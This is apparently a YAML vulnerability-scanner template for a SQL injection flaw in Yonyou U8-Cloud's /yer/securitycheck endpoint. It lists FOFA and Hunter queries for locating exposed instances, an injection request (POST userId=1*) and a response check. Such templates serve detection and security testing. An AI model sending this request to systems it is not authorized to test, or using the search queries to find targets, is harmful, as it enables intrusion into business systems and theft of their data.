product: 用友U8-Cloud
vName: 用友U8-Cloud yer-securitycheck接口SQL注入
type: SQL注入
vID: [ ]
level: 3
vDesc: 用友U8-Cloud-securitycheck-sql注入漏洞，攻击者可构造恶意请求获取系统信息等及其它安全风险。
version: ''
note: ''
search:
  FOFA: app="用友-U8-Cloud"
  Hunter: app.name="用友 U8 Cloud"
protocol: http
link: https://blog.csdn.net/qq_36334672/article/details/135848550
fix:
  - 建议联系软件厂商进行处理。
model: ''
logic: and
exploit:
  - exp:
      method: post
      follow: false
      path: /yer/securitycheck
      data: userId=1*
    verify:
      path: ''
      logic: and
      check:
        - status: 200
          body:
            value:
              - 3$
            logic: and